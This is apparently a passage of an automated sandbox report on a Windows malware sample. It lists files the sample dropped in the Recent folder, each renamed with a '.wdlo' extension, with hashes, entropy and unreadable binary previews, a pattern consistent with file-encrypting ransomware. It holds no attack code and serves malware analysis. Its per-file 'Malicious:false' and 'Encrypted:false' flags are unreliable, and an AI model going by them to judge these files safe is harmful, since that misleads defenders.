                  SHA1:58E600DC3C6297EAF761BF8B2CA87CB02A9DB452
                  SHA-256:E19F5C5C9304711AF3FB201D8F011578137EAEAA50584C79337E62B6B5678B9A
                  SHA-512:7994B19E588390D5B4E590162EEC303C88E51260BBECA3102D825FA1B477E9509AAF8956A00B31299B1B1209C6E56DE94C8EA8C17AD2FCB6CB1C414226158327
                  Malicious:false
                  Preview:GLTYD=`..........[.3...A|......?..1..Y..[^......f.E.>#N......\e....+.(o.z.....ba.$..|8.Q..MT..St..{..M.l..!..0..eX..SLL..i....Xo.eeh.v..J*..W.s.Z....+.C~.."..G..F.4oJ..TE...h..OZ:.e}.<.>.c........s>....%..b>..y.fy.Y...i..o._..n.IG..oe.H..;?..-..2a..\@>.!.+$3...W...X.~V..Q..U..m4..=.[..4.V<..T..C%.g\=O...<..},q.i...<.J...;L28H...7y.O.8.....1.?.>...T.k.?..A-.....pQ.`..d....Hy Z=.....}..51GFUX...r.h..<z.B.`.z......#.N.zZK...h.n.[,@q.`..........t..M..31K..f@H...F0R/....s..).<,.^.:L.g6....N...9.%T.=..w..[.7>.!._.<O..'..J ..]..MAU1..m...Z....h.|.y..<i....R..7l...&E......)..p.zK.N#V.Z..dQm.....=I....w.{..q,#<....W.TL.G....'...4y......`}.....,.xo..q..[yu...q.....Fh.tU..2h%.Lg...56....:...[.s'..L.S....(KJ.f.H2Q..W.>2.....+vo.e.....T.D{....u.7aC"....o.....x...<...e....F..A$..<v..s9..4..<.*...Q.7x.W...M$...7um.qv}K..oW..UJ;.^..E4Q...H.........-2..E1U.x.&u..e{.P@.Q^....oGK..TY..T...t..#.X..j.v...FqC.....r.g`).w.gY.H... {#.(......'...S..:.em

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\GONQPQSVSS.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.840665746414963
                  Encrypted:false
                  SSDEEP:24:fVMyW413vUjIHIyk6juQVEaInz2q8/Xh7o6x6cHbbGbRP29Mory3zbD:9MuUjAIsjXeadXhE64+bbGbRe9MSy3nD
                  MD5:D47BCE596D49B15FFB91658C56E9D3E0
                  SHA1:C3EDA32CABC32EAD9DE1A3589C4E83A5920DB71C
                  SHA-256:6F2FE270D38F804A8E3FD58F48BD333FF582AB98EAB0FD21EC2DC64DA8CE0206
                  SHA-512:5AB2E9F47F87004234D444EA1FE7038D9D0B48A12DF82640E7E2B9F00D723849A1E0AECFB2A7BFFBBA86514CF4BA595AA9C0F138E2F453168D759B7A68CDA551
                  Malicious:false
                  Preview:GONQP..C!.oPQ...9..n.E.F\..S..F=o5.+4..d..H......Wpl...D.o.........w....5....C.<.=Tc...oqm...4...r...?......q.'....WD....$.N..mY............[..].z.........F...g.nF......Qj....h|p...[....... 9..8......-..FE.....]|....r1...]......y.@@../aN+..B.'.`8...u.0'"..@P.*~a.W8Cu.n.CK..s.It..z...,._.!?......\.O......@...^....g.s..}...t...fe..}.ON...Q..U.S._...6..aB.w^.u...s..63Y.w.v..G%.....*<iJ.R]hZu.]`...|.S.k....f..f..1...@..:.....5....5F.w.u.u}../4...(=..1@Z.'....v,A#:..B....d<as0.....Wo..GO3...=TA.}....C.....[...n%k...Z..d....,.t......2.O..2.[w....U[M...Q}".....[q....u.m.'.H........S....DC.I.CM3._...m.7~.M......X4+......K.1N0.h@....F.....1.V.....@......-x......+...!.......L..4......G...".;..}[>b. =x.7.,y..GI..'.v.@...O...<.onD.I.N9?f.X._T.;4.....H..2..y..n.....M...b..V..R.r>....7..B:...!.&.s2.5)R....\...,X?.8.9... .}.%t.b...,.;.;...9/..%.n..e3...NH.P...u..|-.Fe=i..y.yar....'...;.......;...I.......\j..i........ ]......:..^..n.v.......%Q5.l...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\HMPPSXQPQV.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858390543762346
                  Encrypted:false
                  SSDEEP:24:HDI860at9CrA5bnR8M+YIqd2+q0lco38qwxBIeSkhPnBqrq/Fen3zbD:Hav9N5jR8M6+pOKwPkaUrq/M3nD
                  MD5:6E0CC6D9BEF7944AB82C8B4901CEF8F4
                  SHA1:A4F3C0853A0D130402E00800D2BEF1B871C69DC6
                  SHA-256:AAA5FD67A6C4988466F3325C28DB51A5B4E88606D42BE296BEF0BF8A0314C434
                  SHA-512:734E92A73202FF047B4431333DD4D09685857E35F2579668CCE7D8E72508B5B5398704C514B9CFED3A0485FD0DE3EAAF0EA5B2F208A2FDA6E463962C4DB28857
                  Malicious:false
                  Preview:HMPPS2....a.,...6.*......A....IW...k....O.!Xaf]2.>&.*@:..sSuS.eO...o8.......t.....(X..T!^_.'..r..{..............K...]....!P.|...x=}. qw...X.~..,...2...ot3...xREI.....=..(.*~.h....I.... .xCN.......Fa.%?.....|'....(P/jF_.....*.b.p..6...h..v.!.};..f.-.U?.n...f..Hp...\..>.1*GR..K..N.p.g.a"&z.1...i(.U.v..(...4..Uam..a...V.).)....g.o....B...Gz_..A6E..`:.A4.j.G..0.Il(.0.......8S9.....=.`.MAs.*?;..:_.....T..V;/..^e...p=...../..c. .h.*m...v...;.f..uLs.iX...>....t..]d.....T..-X.p.......G.;...m.Y/.ex+@ZsAo...v...Q..>.Luj...7.GCS.vR....d.P\C.b.....i..6./...K.o ......P.,..r...,....mj.:..j.b...N!..D...N..jN.y6.^".6.H.J.s.Y,~.7.8^K3..,.DPe/1......xi.8%.O.DPE.YS..9...t[........ ..........}]f.$|.[T.i........H.o..H.w~2..\R.Jam,.....7...o....X.w.M...P.....[{~:.IK.i.a....yJ<{.SZ..^..N.v.O.K/.y.../#:9..:3.]..V..=..{.`....i.e.m....y...Czm3..<.8..8 ..\Q..'v.t....K.^......_(./........X#'..;...h.P......Xnu.).jV.....c..JW.U..T.en.....'.{.*g..(.N.=....T`..\

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\IZMFBFKMEB.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842221089341733
                  Encrypted:false
                  SSDEEP:24:I5K5fvy7vyP3sv2MjKZAf6IJMsyGgJINCivs1cQDiPVk1XYE3esU+UA9BogqumIT:7nEm3sv2MjK+flJlieC2pQD4CJYnnXA7
                  MD5:83EB8996754B1BCAA8F3441B39097713
                  SHA1:06BBEED9CF818D607AB78F62B2D0918FEED4A18A
                  SHA-256:C8740A13521A83ECA43FE45AAAEF1F175CEEB03008F7158606FA0BDE6A626A20
                  SHA-512:32F48357276EB1C60C2D8CCD3C9E373CE9D37DEB83C2F994815B7C3FFFE58F679CB1A5D178DE0768F4FD26016C6C978E0D67F8655E3D1A6A73363CEF9844CB5D
                  Malicious:false
                  Preview:IZMFB._O...$.4!....>...j.#.R.7\.e,...........Q..3..^...T.W...I4.|.....=..l..(v.O'..TB}.a5T..mq.t.t.b..I.S'<...n97.g.`..[.h...f&_.T..q2_..dNC..c.a...w.I....R......;.*^...RH.mp.....=^bqT..Y..y.T`."...~.....M.1..%...?..}...V.._J........%.i9=6.+.=0E.e.q$...z.....S..Q.....n'i..+.N..g..!......W...8...&>`.,?^.2...xON.ro.J....G....[...r....1..|..p.|....w.......w.R..2hF..,..$..s>.d_Q...^|e+V)_.:.E.O...`(2..c.B.I. .e.0.7,c.}.I...7...k+....sd.....tJ1.....i..A..L....P..j..q......K..+..2.b.."s;t..t[E....&.k....l.xx.t.D.,.+d.o..L..>..........7..Du.[P.=xjJ.KE /.!..... O..(.......W....]KK....0.......r...V........J.M;..<..'...N.P.1..Y.Z.C.T..M...v......v3.........k^...V..v..f.s.Lb.(}..._F+V[e.d..mlh.=>#.5\q.'.\.p;.._.....G..q.Y'./P~.*.(.j.n...j.J..Z*...T..9B..... .l..eu....w......_...C..`..DW{..D...*/...3.^....[T.....y......P}......bI....p.a)..;....>n.f.qE... .l..O....U[.T..5.{c...x..Ty......YS.....N.x...|....4......t(..CJ._(1TF.......ou..~N.bO..|..|...%..?.JB

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\IZMFBFKMEB.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837479211213915
                  Encrypted:false
                  SSDEEP:24:x6iYJQXZo92kBHQ2+Ki43T546+vYsHIJo2EmfVALPPQLnGcs2HX2b0RviD63zbD:x6iYJQJo92kuj8K6BvmtYA41H0nD63nD
                  MD5:8A8C01749EB0356AFCC036AC67E9A600
                  SHA1:8FC924D02C1488EF23EAD5293BE2733698D31B9D
                  SHA-256:E96A6E34338D428644BD8A8438D91B5DD4F4BB37B7762FCE96EF2084186D1206
                  SHA-512:9C897B5E24D70A4B12BFFBD8F9FD5CF9C3B53D529D87CECCE33C800D0D476652AD6FE185C8AE076A29280DD5372D54AE36A812562130C3EAE459D2BB2449876E
                  Malicious:false
                  Preview:IZMFB<....M{.)..t....;j...E{....|..R\../"@V..l.-"3Gb..A..~..Z..{..o._ ..d.....61..y..f.......s..D.x..4...8.n5.\......<...D....[i.Z/.XX.....I..v..?..S4u%Su..4........>.,(...n....0..z.).R..6.B..(..D2...`....~....B-.z..`._.E.u....1.<P.._....}G...B.C..dQ...)X.E%..w(..)!.3s......=.]..KS..>...].>.....i[..B....F...$.........j..\.....lQCS"..K...%b.7!.}o..1fy.<K./...,Q16..,.G1..M1.A..`...0~..t.......tO.z......).|r.........^.)..m...V....nY.e....8.{.......x.....}.,....`.....E.'.......f.8........!.L$..z.4:Z.a3...-.il..K.KF..T0Ho[.-u.T..{m?.-'b..m..,g..S......y.@......$dx....B...;......Sh.8....kV.wD......]RIc......t."[..V.....{.........dCu7K..M.b{.9"A }...5...0.....-.o.".....h..M.pv'^..8..).t.J..v......xy.-..;.r.+...z....".t..i...2...(.S.6a... @U......(....#(....0y...d.o.....F..w........9..XU...'.(.}.|.A.......+.l.b.#16i. ...rhc..~V..2.]..{..9.B...2..A.0..An.!5.k.s..<A..V..y.4.GF.}.E.G...S5....A..g/.....%..4d^G...2."....c.` .B.A....Tr.1..O8.0l..oJ.?{.m..B..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\IZMFBFKMEB.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.847986411190699
                  Encrypted:false
                  SSDEEP:24:u74Bkb5T5FsU/PX42yjj20biUlf4skKbY0p8VJ8K5ZEjfYIVMlVMKKF23zbD:o4YTvsUoHf20b1lf4/P0po8K5ZEDl2lN
                  MD5:F2AE44360DEBD793845FA1AE8636ADBF
                  SHA1:A75D6D354DD44C3C198E84E14D353E14A8ADACE4
                  SHA-256:9E5759F11F5A34D20EF19167CAD2F94F6445EDA209840D067B5A0F248B87C54F
                  SHA-512:DA22ED0520118F1A732BDFCDB58CCE741C838C06A814FE174777F39EC8FC3D41250B9C1AE15815C6D54EC485F2ED6E018C64C3B57FFFAFDEF0940BF5E46667EA
                  Malicious:false
                  Preview:IZMFB32.r\..._.O......... ).1....2B.b..mz..T3.m.R.F.d../.Q.S(|.r5Y{....O.&...Z..F$.}#Os..b.Q.....|..W.%....D....../..Y.....5.].....!.{Q....n.<..X...f..y.OR....&...A4..C....R7.k1.pG.....<"..L.....@..F&z.._....o.9.Jc.u<...J~.....z/WP]~......D.s.H.`.....5o..$w.q..NB,.$H......b.2....%d.p..^;...Y.........D.=b.....R...,.x%I..].=.....7..`..\Qd.JD..q..d..E.kag.]}..sn+.....KC.........k..w.M..8...V...@..].K..N..7]&M..i.n..i.......t...QB..$......m.g.X..X.h......1..?747.....Y.z..:.-.e..l....:..V..h.7....J.*..V,.N;x.2..:IX....../H...EzD.......X...e......I....$.00'Z...!|.2.%g.._r.m`}...x...H.Q.....Y:.&Vg.M....OaD...B..[.J..f..j...8*L;..N.KN.I...=.9S.h......e"....Z......./..M....A.'n.9..N.I..|bb..|q:b$.PG. 5...V*....f.}... 4<h..?.Xx.,......|!+..^....:.............B,..`rM}..[.vWV.WO.@..3....fD(.......D&...@..3. .O6....P...;T.3....H;?2@.,....D..w...{.a4~.G|.B.|...b...k1RZ..r.~.+.N.{..T...M...d..Lt..Q....ZW.& ..."0. 9.o..EH....F.....6..FA....a....Pt0.......B

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\JYQRBXFUOF.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.842712994256691
                  Encrypted:false
                  SSDEEP:24:8GpqJBZQcGHWGgCkgA8RHhJ6cqhxMq0Wb8Dz0Jm1fMxraAMX+owEQAItTxjcp3zX:8aqxQcY8gNJ7KxMq3b8LtMjwfp3nD
                  MD5:0BE7B19BE0A4D41495747908F94CE850
                  SHA1:39FDE36815925FE8B0E1FD6A49D7F072B778842E
                  SHA-256:6CB3E4DFE69A87212FA9F3025B3DDE810142AFA21D00FD6694E8A1EF4EE8A6CD
                  SHA-512:F68B6E0FEBFF7C7D230DB03E06DFE75FAB41215958D1D4F73383D5868801C2301FC9C80CCBF16E5970038AAD1C48BF1670C5EAA5A6A0CD90A415A4631DBE3A4B
                  Malicious:false
                  Preview:JYQRB..d .[.Q6vi.X.....6Z...i,L......#8.....3._[..._......Z.~.....+#<]0.}..e.k...Y.V..r.._.e..SO.....0......HE4`....<./.....g..T...R.....gB.r.n.f..t.giq.$x...m]....(f..Rw-........I...E&...O...s..r......c.a3*...wq..O...YI..d.[3..>....RV.V.K..q..o.(.6"G.....H_.^...l......L..Y...r...-..N."V......i.9+.....Q..%.;.+TrT.+....,....Y.X.O...LZ..vW....w._C......m.f.Q..6.#....:..lc....1=......A....zc...g...8..6.....2:,..-.b.L.8.D1O...`..).....~..j....|H.9)nS...P._.Np.V...@....d....U.p.!MU.v.Y ..5..T.:.:.L2b..;&.xJ.z,.3.LO...s. .........A.^F..}U(..O.HPU.u.f.*.)v.WU.R..."~..j_.L..9.@.5..j.U..E.N....F$.A..T..P...a....`. ..../e(H>)....h@...5./...S....*O..~..t..+K.g=..'Y[.1.3...v.Wn....#../....>.....-.\.u[.RdSe..(sn......T....5..E.....@..... YE...<.a.4..;..<.}..Z...0..k......K.&.."....>}f,....UG%.#I..A..B.Z.mR...=..R.jy.)}.z2.B..h..CB.....b[.Q...>.H.b.....%...#...2z..~@.....J.A.I....&....D..!S.>...#j.,.0..Ea%.S.C.......%....(.<?.6D-..4....IL.....DjDV.l.LT.S{.@....

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LCLZALVXRY.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.85270376587908
                  Encrypted:false
                  SSDEEP:24:TSWsuCTj19EVBrKmbUKlH456z8V27KxrcfkVuoIfBDAEABbYQZI093zbD:m5j3EV9Kyx23c7ecfvBDWfX3nD
                  MD5:5FCB6EECCBF59AAFB6510D3CD4BABA42
                  SHA1:08495FD039F0B0C3DF9C62A5ECA988D4130F14FD
                  SHA-256:F3319B4396B5D7C3F60F8B8612202CD3B452CD955335C3AC8E641F3C138812DB
                  SHA-512:0FFF2C6829FE65407E244A9D34D4332F771DC4EDCC98F78BBC71A5503CD4440241B2C389805C5BC4EA3F2FD5AD28BF85126ADB7E7077F4F0F9206F3BE0D2EEB3
                  Malicious:false
                  Preview:LCLZAWN..A.!.!.*I...v.$.dc..9.@".....3.....Y.......(>.g..4....7{0z.1.3.....nu.[&...v..$.-......%.V/.<..]...7...:Q...!.H.0.^8..<..L..r........T.-....(....U.....0.........q.g.LK....[.*......"._..,....%.....X..ll..lo.~.....@.&.~......l.x..I\..ER..HL.r4.3.CR..M<]=z.$.9./dA..n.XB.uA.\P..=U.!..G#....VG}$...Q<.Y..F........t...1...[....5..2..X<.J?.o.....l...A.s...7....;.R.!..Z..;..!29.+.H./....FsB..+O.J7,.o;-...UI-.Ka.d..?..!...\...8L..c.s2...T3..1......:...[...nJ.r.Z..c;I...J@V+l.DP.....#:...c57.f.o.~....m.............~....e.8..'x..O&[......:.#...6...9.....C..5..{.#.(B...0.f..m........FQ..,h.....v.....G.......f.z.......Y4...........')].....'.3.Di.5......j...m.....L3~..3y../.ze#...v...~...d%..5..|...?.Bh.N...O.......L.3...p.&...../.W..oM.k$R....s].X.0.=.3......o...:Y)Ce.w.`.r|..+.o.xJXX.y.K0.Y.!.Y..A..Q....w...:.....4.vb^....Q.8.s;...n.;....P.1.*.a.X..Qf.....>....`c;...0......r[g...q[......2.Tc...;..E%Lq.7e..(..lq..9$..../..&.:j..8vx1.

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LCLZALVXRY.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.852140862252882
                  Encrypted:false
                  SSDEEP:24:fY312hqh5TAzivxCgmJ3TRu84OG5eWsXshRgO8mMrYqre67RMt03zbD:fY3/h58exEtcTeWs9O8fPC67KO3nD
                  MD5:D72744BAA9825B3C8456D68CE93EC683
                  SHA1:3A86FA72EA62CF55C7625A3887DBA5FC32AFE88C
                  SHA-256:BE45CC475A4ACFAFD4A8FA644ED117EC7585515573351E03BBDEB5EC008DF2CE
                  SHA-512:11BD3C8D0AEA5C89AAA4B847E065A33245377326F701FFDF03E1A3C7C8620BA189B7AA55195D3B3407A8D2EEFB48B2313C9F2775A9D53BC233F9F92332FBE71C
                  Malicious:false
                  Preview:LCLZA.......B...6l...V..K.. ...Cl..$.n.{...B.w....M..m'...$=a..$.Ju....l.....(.e..1........A..X....Am.Z88Tt...s.4.4.....B0.UJ.o.Q.r.......O~.w{F....^;...}..Po........*g.P.z%!M...)<.h&T.D.|.~W..~k..."r.+..M+`...B.....y.6M.._w .K.^.fb.....>.})..P>.>.....;.i...8s...X.,..1C_....b..e...-).&.t.I..U..!..|...i...7..~HP.0m'.A....Q...<b.....].-k1.o9....V....L.U.]).m5..oTF...V.u..3.....R>.....{..h.Cw.:].z.5m.. ;*....n......,xx........p.`......Y....o3.v.9.U.d....xh%q....Gr.O..6p6.Q#?.)./.,o.....y..{.4Q.%<.].A...a..K.2H......uX.("8...-/Yb.u,.5.w..!..eA.V>......j..Es>..a.$...........&A]>...z..m6.K.....l5...Diu~-.5..v.....1td@3..........q1T.."...;?.....Y.s.-..jP.........a.K..ZH..@.d .7#.Q.Z........cXY..!..:p.e.gh....5.b....{..$y...{.f}......B.$..I.+.IF.j..R*.....^2...>~.f..M..S..mo....U...MA.q..yB."ab.........Z.iwVD..Itc..e...y....E`nQc...K.]w...Z..hB......B..........y......86.~..Tp...I%..$3.L....;..'.&'q....aF.-..La.acns>...Ybc.x.R..../!....'%a}b]?

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LCLZALVXRY.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8458257431840055
                  Encrypted:false
                  SSDEEP:24:AjhOVdHiKuIHrPDsQ2hmF4lAn1PcIDupCL0YKVVozPiTss0FQwb0FmHALio89eHf:yoVdHykLslS4lAnCIDugL9RDwsFQTFmk
                  MD5:E5EDFA1EBFF708CE5C9FF9F86E388F30
                  SHA1:E3B0B94B1B02E665D09D63EFDAFB4E906BD94818
                  SHA-256:0425D0223908B49389A2BF3303E3958795D578D53CEF06431D1A1C0C84E1A41B
                  SHA-512:FACA129DD0373390909F0071827C4193F3858C80ECBA6EB97C2E6D7F523C70364347991876C9C2B262852CCD2FEDBB78B717B6A00D6C5498887666BB676552CB
                  Malicious:false
                  Preview:LCLZA...I.X.B..!.......6rj.>..X....tfj..^.....g..(.P..!..@.N....g..q.m_hM...e9..16....#x....g;...7o....j.Z.....H9..z.O....z+4.$..~J./B!S...v....T.k......r9.j."!..3..2L...s$.>e.lw.........$...;....k...iK..XZ.zh...`).Q....UO..).../.z....-Q.5.\<....Y..H..p....nu.....Y.L..7.......F.:H.G.W.S.Kj.*M&....z#...2...fz.r..9,c...E.<..--...D,.0.gQ.S!y.Mer......_.U.&....7%.N.(...6.....dB.....v..6....k..z...%.......f...F..`Gy].z....z.L...`......p.5m`...q...~}..J.....FC...rs].....mj`.S.K.r.5.......,...$.?o.{.*.T3M..{O..RtT.i..d.?.jd.f............|@.`l...n.?..^.8.\.....W.u..F..w.Rq7.6}......d.Tp..@.........N.c\*e{1.....dD.}y2$kMi%..@'...j.aQ...kD..}..bt....z."/...4.'H...H..NE.....$.].7....%...j.(....+.z.k..6B..1%..U....j.g.....q.5...".,.....!..KQ..!a....cSG%=e......L.S:.%.,..^.!..h]..]w.s.8Q ..,.8o...u.L..|...m..L...C.....t..Fi.#..Y...9....}.....sz..^...@}..Lq...X.Ee.`.........9._..S.M...J..f.......y...>...op.T.;Xsj4.u[.Y?. ..i?.Xh...!..u.w.G.....Y..9.....[.G..

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LFOPODGVOH.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.845439193355527
                  Encrypted:false
                  SSDEEP:24:GE1EftvisA15zR0cg6EXtpzc2NarBlZnJJyxgUeVPdmQvDThX43zbD:GEWfMsE0B9pbazZnJgxR8txo3nD
                  MD5:B74C3DBF821DC08AAA6642DC737651AD
                  SHA1:459F467AB1CAF879A6C1D9485BDE271E15C39B7B
                  SHA-256:A0E5B1E23F3308E022FAD04E4C13C973767C94466CF1F2B6CB6015608B7EFFD5
                  SHA-512:E06D79616482D8C733BD269C9EAE9D5A8180E36912F56240A8F1C71583B0DA6847C31F03A014CF4BDCC657A217FDB52A021FFFF67FF74E5705424D967A8350FB
                  Malicious:false
                  Preview:LFOPO.S...F"..Z.6.,.Y.....4>:...m......8.j..';ip......u...'^Z.."#;a#w..[..[.@BV.^..N.X...D~,...R....X.^u...Z..~....j.....la.$z...a..NP..O...R.;.|.B^.{.......q`N..z...2L.._cXTR..7UC*...7..H....nf...............;.[.0<...k....4..6.r*e..G. ....H.7.i.8..N..F.&..6.....!...:..D...!.VLdN$r'...N.1..m.../.;.].....2..".@..:.....XvNz....Q*Uf).c..Az.....oO...d...i.R..PDR......b..]....G%...yj.>..8[.F.....C.m.w.+.[_/...Q.....RJ.G..x..<:.n.ePO.$...]j..I.A.4.xu.$W.?....R...V.J[:. _...7&..\.F.J....O.6{n...v..Mb..u8[...{I.}h...8Eq....{a..T}X...yO.4......F.gK..R.I.p.4.?.C.`>E....i-..<%/...h.A.?O.../.y..s>:l.+.....<....[?\L._....Y^....o... .K...sFD.....mj%.^.X?..:.x..#.s..I..x.......,...H.aC.M.......:Y..n.8'6.!.q.t.tlI...xB..+%......U8..q....K.m.t.L..=wl.l......0....xU.3qW.=.(."..H......o..>L].F....Ibm...t..[Y.o..3..[=1v...LS..(.b`....?.. .S) .B..a.t..eN...(.T[....Z*.P..AF.....8~-*e.UD..).EX..........8..=..u..<H..p-.V./...(.O....h(..0_........`..GL..t...[..,

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LFOPODGVOH.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.84640040212016
                  Encrypted:false
                  SSDEEP:24:X3J2pFMk4Pv82ghYiXVhENgVVVJ41aLF225M9FSojrGGS3w5vq9ySMf9t3AdPzkB:X32F3A82giMEoVJZ7KnWPyj9WWsRaT3D
                  MD5:185B797B2B792E736D937C1D5182E8E7
                  SHA1:5C63B366E869A1BB00AA3CB3D43BBBC49E61BCD9
                  SHA-256:9C4E2737982FC06A327DAC1CE1D3CCA7FEF433303FB38EE2C840E001FD5BA7AB
                  SHA-512:E7A56E6A731FE21ED5DAF80077426F5DA6B595BE6CEDCEB33870949A9F9D31DF9C7F6C43C8E69ACF21840895C22B79E5249EF2C1BD1B978C3E0900A1B9A03E88
                  Malicious:false
                  Preview:LFOPO.t.u...9._g..5...7..-..9.;..+Z.u.E..NU7?"^.c.X.......[..k%..._...V...%.V..&}j.).5f:f..|....u.9!l...k....-N.....L.....1.\T]...v..K.....8ZI....7o/.7..W.uWa....J.....YcBZ.,...V...}.]!Do...Uu.&)<..^.@|.....T?K<.g.Nmk|.../..tP..^.(e.K....}......1C.w5x..7J\.c..Q.:..e....3.........F.:..f.q.. ....P.&.k...\....S..mMJ......#..'.?...V.P../.f....|j.C..._.$l.|o.J.*~..%.eLD..M...bN..K!...%...hXh..m{...hv..:=d......O...O.N.+..3w.\}P...J.?.+E,<.*.%6...\i..-...r..$....e.w\Im."+'.d.h5%H}.Qu.s .X...b....~..y.W.ykn@s..a.A....y..r=.(+.)...|.|^C~B..~.E.H..%q.j....1.*...I.g...T...0u.&..>|.O....}....!2..:..R...].NpD..Qf.Un....M>....[W..,W.9T........j..1..!1|]Q....Z....n....{-D..o....;..D..nBD..93.._r..I65..g...7@OX".w.*........._..z..f..5.u..N..Yi.\...1q"{%>..H=l.HSsW.t..C2)..y.....K......0....4HT8-....8Z:..Q.~v.8..d...=..k.F....C..>...+-.....d......z.{.....y....t......6NUU'....,...Y..E.P..*....~.f.Fe.......+.R.Q..%.w.?6.T....5..R...YQ.......L....3..}...w...MQ..p.j..8...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LIJDSFKJZG.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.8549329365103775
                  Encrypted:false
                  SSDEEP:24:DqizaRGs5n4p+BeqHv/twdQARh2xFL+3LXEcKA2kbRxmCK1a9+zR3Mk3zbD:FzaRz5n4UegdXAT2i7EcKA2kbRJK1q0J
                  MD5:16D6B77A619EAD2A99AC7F6765A8624E
                  SHA1:DC77438856DEF1BB58A5C212AFDDDC3EB092A9A2
                  SHA-256:92128E73C38484D2645297C03686A99E07F7793EAEE3B3613E5904C2FED02E47
                  SHA-512:32C5BBC6705824881024A298526B8F959BA4BA4705A8C98E90F57F1EABCE3BCDDFF18CFAA6DFA707208C7F176E6CB177DF0C536565D4C5EB81E46E717179E12E
                  Malicious:false
                  Preview:LIJDS.y........@.{..H.....N.mu*..O?O...hU#....1.0x.g`....Nw.B..`.Qm'.!^.Mj.8....(7.3..9.......}j2U...TS.\R...g.&.a..gk.a.]..K .>..|.E.:3. $.V.9....y..L....|.$AA....w...{....%...8...;.^o.v.......I{.de25..ig..~.J=?..n.|....../.9-.R.qF3".H.qw.1.)=..^U.<..g..|..P.X....}...y4.oq<.d.i.f....!.0B].+3.....-.~.=V..Y.g..l"...;ki...C.?q...4^_p2....n.'^.Mo`...vp...MC.J..E.H"]...m..........,.dy9..cZ.[W...b!D..|of..[a...o..D.....oP..d..'..vc....)!>..<.Wz.M...I.N..;..uEV....l\..=..#..8p......K./~..;..g.W....)Eo.......u...&.{..{.v]!..Cc=....i.NZJb&.l....\!r:+.M{rn'.^.!.>....@+jG......?..$.6..}.k`.^n..f*.H....K.3...,.......y.>{{.qb...sw...[........`e..BD=0y.9..s.b.L.qQ.._...0..-...|..26....iP.[...=q..Kt..u.,s.?$.....pL.]X...xy...<......u..S...8.^.....>....c.M50..-.P,..3$^.Q..=....@D...Y..K8..U.......M........._a...uv..Hy_..|......B..5..j"9>.v...M];.5.....ar..&....`.......4,@Yb5.(.;(kv.....f.P.e..&....X..:eak...m.`E.t.-...h;~P......V}..<6..qW...[.@...d:.....S...

                  C:\Users\user\Application Data\Microsoft\Windows\Recent\LIJDSFKJZG.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.827946588417522
                  Encrypted:false
                  SSDEEP:24:zoq2AklnGaGi5gHnCN0+29oCwRPdNNHEgkbX1vLP9ikFwHyUL3zbD:0fAkokgHV+2KDLNfc1vD9jwSUL3nD
                  MD5:47E0C711116F0DA9938E0447A28EE2C2
                  SHA1:7102CE82CA571B6CD59CE863BDE11DAE713168BE
